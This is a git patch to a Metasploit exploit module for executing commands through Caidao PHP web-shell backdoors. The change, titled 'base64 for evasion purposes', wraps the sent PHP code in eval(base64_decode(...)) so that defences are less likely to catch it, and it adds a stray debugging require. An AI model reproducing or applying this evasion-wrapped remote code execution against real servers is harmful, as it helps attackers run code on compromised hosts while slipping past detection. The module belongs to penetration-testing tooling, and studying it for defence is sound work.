From 46fe0c0899c32cd83ba19b6dff7c8bc110a12e92 Mon Sep 17 00:00:00 2001
From: nixawk <hap.ddup@gmail.com>
Date: Tue, 3 Nov 2015 06:42:52 +0000
Subject: [PATCH] base64 for evasion purposes

---
 modules/exploits/multi/http/caidao_php_backdoor_exec.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
index 79f0280d9f..b92814d15e 100644
--- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
+++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -5,6 +5,7 @@
 ##
 
 require 'msf/core'
+require 'pry'
 
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -26,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
         ],
       'Payload'           =>
         {
-          'BadChars'      => '\x00',
+          'BadChars'      => '\x00'
         },
       'Platform'          => ['php'],
       'Arch'              => ARCH_PHP,
@@ -46,6 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def http_send_command(code)
+    code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
     res = send_request_cgi({
       'method'    => 'POST',
       'uri'       => normalize_uri(target_uri.path),